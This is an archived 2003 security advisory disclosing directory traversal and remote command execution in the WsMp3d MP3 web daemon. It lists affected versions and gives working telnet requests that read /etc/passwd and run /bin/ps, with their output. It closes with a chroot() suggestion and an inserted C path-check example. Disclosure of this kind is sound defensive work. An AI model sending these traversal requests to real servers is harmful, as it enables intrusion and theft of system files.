a-WsMPdvuln.txt

2003-05-23T00:00:00
ID PACKETSTORM:31149
Type packetstorm
Reporter Xpl017Elz
Modified 2003-05-23T00:00:00

Description

                                        
==========================================  
INetCop Security Advisory #2003-0x82-017.a  
==========================================  
  
  
* Title: WsMP3d Directory Traversing Vulnerability  
  
  
0x01. Description  
  
  
WsMp3d is a daemon for enjoying MP3s.
The daemon is reachable over the web, and a directory traversal bug exists in it.
It also allows commands to be executed remotely.
  
  
0x02. Vulnerable Packages  
  
  
Vendor site: http://wsmp3.sourceforge.net/  
  
WsMp3-0.0.10.tar.gz version.  
+Linux  
WsMp3-0.0.9.tar.gz version.  
WsMp3-0.0.8.tar.gz version.  
web_server-0.0.7.tar.gz version.  
web_server-0.0.6.tar.gz version.  
web_server-0.0.5.tar.gz version.  
web_server-0.0.4.tar.gz version.  
web_server-0.0.3.tar.gz version.  
web_server-0.0.2.tar.gz version.  
web_server-0.0.1.tar.gz version.  
  
  
0x03. Exploit  
  
  
#1) Directory traversal exploit:

The files in a directory can be listed as follows:

http://wsmp3.server.com/cmd:ls

Then use a known directory in the request:
  
bash$ telnet wsmp3.server.com 8000  
Trying 61.37.xxx.xx...  
Connected to 61.37.xxx.xx.  
Escape character is '^]'.  
GET /dir/../../../../../../etc/passwd HTTP/1.0  
  
... passwd file here ...  
  
OK, it's possible to read the `/etc/passwd' file!
What if the daemon is run as root?? hehehe ;-)

#2) Remote command execution exploit:
  
bash$ telnet wsmp3.server.com 8000  
Trying 61.37.xxx.xx...  
Connected to 61.37.xxx.xx.  
Escape character is '^]'.  
POST /dir/../../../../../../bin/ps HTTP/1.0  
HTTP/1.1 200 OK  
Connection: close  
Content-Type: text/html  
Date: Sat May 03 01:25:28 2003  
Last-Modified: Sat May 03 01:25:28 2003  
Content-Length: 201  
  
PID TTY TIME CMD  
29529 pts/2 00:00:00 login  
29559 pts/2 00:00:00 su  
29560 pts/2 00:00:00 bash  
29681 pts/2 00:00:10 WsMp3  
29730 pts/2 00:00:00 WsMp3  
29731 pts/2 00:00:00 ps  
Connection closed by foreign host.  
bash$  
  
  
0x04. Patch  
  
  
It can be solved with the chroot() function. :-)
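
The traversal requests in section 0x03 can also be refused inside the daemon by canonicalizing the requested path and checking that it stays under the document root. The following C code is an added example, not WsMp3 code or the author's patch; `resolve_under_root`, `demo_check` and the temporary document root are hypothetical names and constructed sample data.

```c
/* Added example, not WsMp3 code; every name here is hypothetical. */
#define _XOPEN_SOURCE 700
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>

/* Canonicalize doc_root/req_path with realpath(), which collapses ".." and
 * follows symlinks. Returns 0 only if the result is still inside doc_root. */
int resolve_under_root(const char *doc_root, const char *req_path,
                       char real[PATH_MAX])
{
    char root[PATH_MAX], joined[PATH_MAX];
    if (realpath(doc_root, root) != NULL) {
        size_t rlen = strlen(root);
        int n = snprintf(joined, sizeof joined, "%s/%s", root, req_path);
        /* Inside = root itself or root + "/...", not a same-prefix sibling. */
        if (n > 0 && (size_t)n < sizeof joined && realpath(joined, real) != NULL
            && (rlen == 1 || (strncmp(real, root, rlen) == 0 &&
                              (real[rlen] == '/' || real[rlen] == '\0'))))
            return 0;
    }
    real[0] = '\0'; /* never hand a rejected path back to the caller */
    return -1;
}

/* Constructed sample: a temporary document root holding dir/song.mp3.
 * Returns the verdict for req_path, or -2 if the sample cannot be built. */
int demo_check(const char *req_path)
{
    char tmpl[] = "/tmp/wsmp3demoXXXXXX", path[PATH_MAX], real[PATH_MAX];
    FILE *f;
    if (mkdtemp(tmpl) == NULL)
        return -2;
    snprintf(path, sizeof path, "%s/dir", tmpl);
    if (mkdir(path, 0700) != 0)
        return -2;
    strcat(path, "/song.mp3");
    if ((f = fopen(path, "w")) == NULL)
        return -2;
    fclose(f);
    return resolve_under_root(tmpl, req_path, real);
}

int main(void)
{
    return demo_check("/dir/../../../../../../etc/passwd") == -1 ? 0 : 1;
}
```

This check needs no root privileges and complements chroot(); it has to run on every request path, GET and POST alike, before the file is opened or executed.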
  
  
P.S.: Sorry for my poor English.
  
--  
By "dong-houn yoU" (Xpl017Elz), in INetCop(c) Security.  
  
MSN & E-mail: szoahc(at)hotmail(dot)com,  
xploit(at)hackermail(dot)com  
  
INetCop Security Home: http://www.inetcop.org (Korean hacking game)  
My World: http://x82.i21c.net & http://x82.inetcop.org  
  
GPG public key: http://x82.inetcop.org/h0me/pr0file/x82.k3y  
--  
  